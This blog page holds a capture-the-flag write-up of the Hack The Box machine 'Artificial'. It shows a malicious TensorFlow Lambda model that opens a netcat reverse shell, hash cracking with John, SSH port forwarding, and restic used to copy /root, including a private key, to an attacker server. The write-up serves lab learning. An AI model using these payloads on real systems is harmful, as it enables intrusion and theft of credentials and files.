<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="NI8STALKER">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set data attribute for CSS variables
                root.setAttribute("data-theme", theme);
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes once DOM is ready
            if (document.readyState !== "loading") {
                document.body.classList.add(theme + "-mode");
            } else {
                document.addEventListener("DOMContentLoaded", () => {
                    document.body.classList.add(theme + "-mode");
                    document.body.classList.remove((theme === DARK ? LIGHT : DARK) + "-mode");
                });
            }
        })();
    </script>
    
    <!-- Critical CSS to prevent flash -->
    <style>
        :root[data-theme="dark"] {
            --background-color: #202124;
            --background-color-transparent: rgba(32, 33, 36, 0.6);
            --second-background-color: #2d2e32;
            --third-background-color: #34353a;
            --third-background-color-transparent: rgba(32, 33, 36, 0.6);
            --primary-color: #0066CC;
            --first-text-color: #ffffff;
            --second-text-color: #eeeeee;
            --third-text-color: #bebec6;
            --fourth-text-color: #999999;
            --default-text-color: #bebec6;
            --invert-text-color: #373D3F;
            --border-color: rgba(255, 255, 255, 0.08);
            --selection-color: #0066CC;
            --shadow-color-1: rgba(255, 255, 255, 0.08);
            --shadow-color-2: rgba(255, 255, 255, 0.05);
        }
        
        :root[data-theme="light"] {
            --background-color: #fff;
            --background-color-transparent: rgba(255, 255, 255, 0.6);
            --second-background-color: #f8f8f8;
            --third-background-color: #f2f2f2;
            --third-background-color-transparent: rgba(241, 241, 241, 0.6);
            --primary-color: #0066CC;
            --first-text-color: #16171a;
            --second-text-color: #2f3037;
            --third-text-color: #5e5e5e;
            --fourth-text-color: #eeeeee;
            --default-text-color: #373D3F;
            --invert-text-color: #bebec6;
            --border-color: rgba(0, 0, 0, 0.08);
            --selection-color: #0066CC;
            --shadow-color-1: rgba(0, 0, 0, 0.08);
            --shadow-color-2: rgba(0, 0, 0, 0.05);
        }
        
        body {
            background-color: var(--background-color);
            color: var(--default-text-color);
        }
        
        /* Apply body classes as soon as DOM is ready */
        :root[data-theme="dark"] body {
            background-color: var(--background-color);
            color: var(--default-text-color);
        }
    </style>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/06/23/hackthebox-artificial-2025/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="NI8STALKER, On the hunt for the next big thing">
<meta property="og:type" content="article">
<meta property="og:title" content="Hack The Box - Artificial (2025) Writeup">
<meta property="og:url" content="http://example.com/2025/06/23/hackthebox-artificial-2025/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="NI8STALKER, On the hunt for the next big thing">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2025-06-23T12:30:00.000Z">
<meta property="article:modified_time" content="2025-07-23T16:44:55.478Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Artificial">
<meta property="article:tag" content="TensorFlow">
<meta property="article:tag" content="Docker">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="Privilege Escalation">
<meta property="article:tag" content="restic">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            Hack The Box - Artificial (2025) Writeup | NI8STALKER
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":false,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"Recommended Reading","limit":3,"mobile_limit":2,"placeholder":"/images/pexels-iliescu-victor-95204-306198.jpg","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"single_page":true,"preloader":{"enable":false,"custom_message":null},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"NI8STALKER, On the hunt for the next big thing"},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/pexels-iliescu-victor-95204-306198.jpg","dark":"/images/pexels-negativespace-34153.jpg"},"title":"NI8STALKER","subtitle":{"text":[],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"github.com/selfi123","linkedin":"linkedin.com/in/abel-jorlin-812981230","email":"abelselfi12@gmail.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.5","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Status":{"path":"https://linkedin.com/in/abel-jorlin-812981230","icon":"fa-regular fa-chart-bar"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Portfolio":"/portfolio"}},"Links":{"icon":"fa-regular fa-link","submenus":{"Linkedin":"https://linkedin.com/in/abel-jorlin-812981230","Github":"https://github.com/selfi123","Instagram":"https://www.instagram.com/strrik_king_selfi/","Twitter":"https://x.com/abel_jorlin"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                NI8STALKER
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230"
                                        >
                                    <i class="fa-regular fa-chart-bar fa-fw"></i>
                                    STATUS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/about">
                                                    ME
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a href="/portfolio">
                                                    PORTFOLIO
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230">
                                                    LINKEDIN
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://github.com/selfi123">
                                                    GITHUB
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://www.instagram.com/strrik_king_selfi/">
                                                    INSTAGRAM
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://x.com/abel_jorlin">
                                                    TWITTER
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230"
                        >
                            <span>
                                STATUS
                            </span>
                            
                                <i class="fa-regular fa-chart-bar fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-About"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-About">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/about">ME</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/portfolio">PORTFOLIO</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-Links"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-Links">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230">LINKEDIN</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://github.com/selfi123">GITHUB</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://www.instagram.com/strrik_king_selfi/">INSTAGRAM</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://x.com/abel_jorlin">TWITTER</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">30</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">7</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">Hack The Box - Artificial (2025) Writeup</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/redefine-avatar.svg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">NI8STALKER</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-06-23 18:00</span>
        <span class="mobile">2025-06-23 18:00</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-07-23 22:14:55</span>
            <span class="mobile">2025-07-23 22:14:55</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/HackTheBox/">HackTheBox</a>&nbsp;
                        </li>
                    
                    
                
                    
                        
                            <li>></li>
                        
                        <li>
                            <a href="/categories/HackTheBox/Writeups/">Writeups</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Artificial/">Artificial</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/TensorFlow/">TensorFlow</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Docker/">Docker</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Linux/">Linux</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Privilege-Escalation/">Privilege Escalation</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/restic/">restic</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="Artificial-Hack-The-Box-2025"><a href="#Artificial-Hack-The-Box-2025" class="headerlink" title="Artificial (Hack The Box) - 2025"></a>Artificial (Hack The Box) - 2025</h1><blockquote>
<p>“Sometimes, the best way to break an AI is to think like a human hacker.”</p>
</blockquote>
<hr>
<h2 id="1-Recon-The-First-Clues"><a href="#1-Recon-The-First-Clues" class="headerlink" title="1. Recon: The First Clues"></a>1. Recon: The First Clues</h2><p>It all started with a simple Nmap scan. The box, named <strong>Artificial</strong>, greeted me with two open ports:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -A artificial.htb</span><br></pre></td></tr></table></figure></div>

<ul>
<li><strong>22&#x2F;tcp</strong>: OpenSSH 8.2p1</li>
<li><strong>80&#x2F;tcp</strong>: Nginx 1.18.0, serving a site called “Artificial - AI Solutions”</li>
</ul>
<blockquote>
<p><em>Lesson: Always start with the basics. Every open port is a potential story.</em></p>
</blockquote>
<hr>
<h2 id="2-Web-App-Dockerfile-Peeking-Behind-the-Curtain"><a href="#2-Web-App-Dockerfile-Peeking-Behind-the-Curtain" class="headerlink" title="2. Web App &amp; Dockerfile: Peeking Behind the Curtain"></a>2. Web App &amp; Dockerfile: Peeking Behind the Curtain</h2><p>The website looked modern, but registration was open. After signing up, I found an upload page and, more interestingly, downloadable files: <code>Dockerfile</code> and <code>requirements.txt</code>.</p>
<p>The Dockerfile revealed the environment:</p>
<ul>
<li>Python 3.8</li>
<li>TensorFlow CPU 2.13.1</li>
<li>Bash as entrypoint</li>
</ul>
<blockquote>
<p><em>If you can reconstruct the target’s environment, you can often reconstruct their mistakes.</em></p>
</blockquote>
<hr>
<h2 id="3-TensorFlow-Lambda-RCE-When-AI-Bites-Back"><a href="#3-TensorFlow-Lambda-RCE-When-AI-Bites-Back" class="headerlink" title="3. TensorFlow Lambda RCE: When AI Bites Back"></a>3. TensorFlow Lambda RCE: When AI Bites Back</h2><p>Knowing TensorFlow was in play, I recalled past RCEs involving Lambda layers. I spun up a local Docker container to test my theory:</p>
<div class="code-container" data-rel="Dockerfile"><figure class="iseeu highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">FROM</span> python:<span class="number">3.8</span>-slim</span><br><span class="line"><span class="keyword">WORKDIR</span><span class="language-bash"> /code</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> apt-get update &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    apt-get install -y curl &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    curl -k -LO https://...tensorflow_cpu-2.13.1...whl &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    <span class="built_in">rm</span> -rf /var/lib/apt/lists/*</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> pip install ./tensorflow_cpu-2.13.1...whl</span></span><br><span class="line"><span class="keyword">ENTRYPOINT</span><span class="language-bash"> [<span class="string">&quot;/bin/bash&quot;</span>]</span></span><br></pre></td></tr></table></figure></div>

<p>Then, I crafted a malicious model:</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> tensorflow <span class="keyword">as</span> tf</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exploit</span>(<span class="params">x</span>):</span><br><span class="line">    os.system(<span class="string">&quot;rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;your-ip&gt; 6666 &gt;/tmp/f&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> x</span><br><span class="line"></span><br><span class="line">model = tf.keras.Sequential()</span><br><span class="line">model.add(tf.keras.layers.Input(shape=(<span class="number">64</span>,)))</span><br><span class="line">model.add(tf.keras.layers.Lambda(exploit))</span><br><span class="line">model.<span class="built_in">compile</span>()</span><br><span class="line">model.save(<span class="string">&quot;exploit.h5&quot;</span>)</span><br></pre></td></tr></table></figure></div>

<p>Uploaded <code>exploit.h5</code>, clicked “View Predictions,” and… my netcat listener popped a shell. AI, meet human ingenuity.</p>
<hr>
<h2 id="4-From-app-to-gael-Chasing-Hashes"><a href="#4-From-app-to-gael-Chasing-Hashes" class="headerlink" title="4. From app to gael: Chasing Hashes"></a>4. From app to gael: Chasing Hashes</h2><p>Inside the container as user <code>app</code>, I found a SQLite database:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> ~/app/instance/</span><br><span class="line">sqlite3 users.db</span><br><span class="line">sqlite&gt; SELECT * FROM user;</span><br></pre></td></tr></table></figure></div>

<p>Dumped a hash, then cracked it with John:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;c9**********************&quot;</span> &gt; hash.txt</span><br><span class="line">john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5</span><br></pre></td></tr></table></figure></div>

<p>Result: <code>gael : ***************</code></p>
<hr>
<h2 id="5-Backups-Bcrypt-The-sysadm-Secret"><a href="#5-Backups-Bcrypt-The-sysadm-Secret" class="headerlink" title="5. Backups &amp; Bcrypt: The sysadm Secret"></a>5. Backups &amp; Bcrypt: The sysadm Secret</h2><p>As <code>gael</code>, I noticed I was in the <code>sysadm</code> group. In <code>/var/backups/</code>, a file <code>backrest_backup.tar.gz</code> was readable. Extracting it, I found a <code>config.json</code> with a bcrypt hash.</p>
<p>Cracked it with John (after base64 decoding):</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;&lt;hash&gt;&quot;</span> | <span class="built_in">base64</span> -d &gt; hash.txt</span><br><span class="line">john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt</span><br></pre></td></tr></table></figure></div>

<p>Result: <code>backrest_root : *******</code></p>
<hr>
<h2 id="6-Port-Forwarding-Opening-the-Inner-Door"><a href="#6-Port-Forwarding-Opening-the-Inner-Door" class="headerlink" title="6. Port Forwarding: Opening the Inner Door"></a>6. Port Forwarding: Opening the Inner Door</h2><p>A service was listening on <code>127.0.0.1:9898</code>. I used SSH port forwarding to access it:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898</span><br></pre></td></tr></table></figure></div>

<hr>
<h2 id="7-restic-Backing-Up-the-Root"><a href="#7-restic-Backing-Up-the-Root" class="headerlink" title="7. restic: Backing Up the Root"></a>7. restic: Backing Up the Root</h2><p>The internal service was a rest-server. I started my own rest-server and used restic to back up <code>/root</code> from the victim:</p>
<p><strong>On attacker:</strong></p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./rest-server --path /tmp/restic-data --listen :7777 --no-auth</span><br></pre></td></tr></table></figure></div>

<p><strong>On victim:</strong></p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">restic -r rest:http://10.10.16.46:7777/myrepo init</span><br><span class="line">restic -r rest:http://10.10.16.46:7777/myrepo backup /root</span><br></pre></td></tr></table></figure></div>

<p><strong>On attacker:</strong></p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">restic -r /tmp/restic-data/myrepo snapshots</span><br><span class="line">restic -r /tmp/restic-data/myrepo restore &lt;snapshot-id&gt; --target ./restore</span><br></pre></td></tr></table></figure></div>

<p>Inside the restored <code>/root</code> folder: <code>root.txt</code> and <code>id_rsa</code>.</p>
<hr>
<h2 id="8-Root-The-Final-Step"><a href="#8-Root-The-Final-Step" class="headerlink" title="8. Root: The Final Step"></a>8. Root: The Final Step</h2><p>With the private key, I could SSH as root:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i ./id_rsa root@artificial.htb</span><br></pre></td></tr></table></figure></div>

<p>Or just read the flag directly. Mission complete.</p>
<hr>
<h2 id="Reflections"><a href="#Reflections" class="headerlink" title="Reflections"></a>Reflections</h2><ul>
<li><strong>AI is only as secure as its weakest link.</strong></li>
<li><strong>Docker isolation is not a silver bullet.</strong></li>
<li><strong>Backups can be a goldmine for attackers.</strong></li>
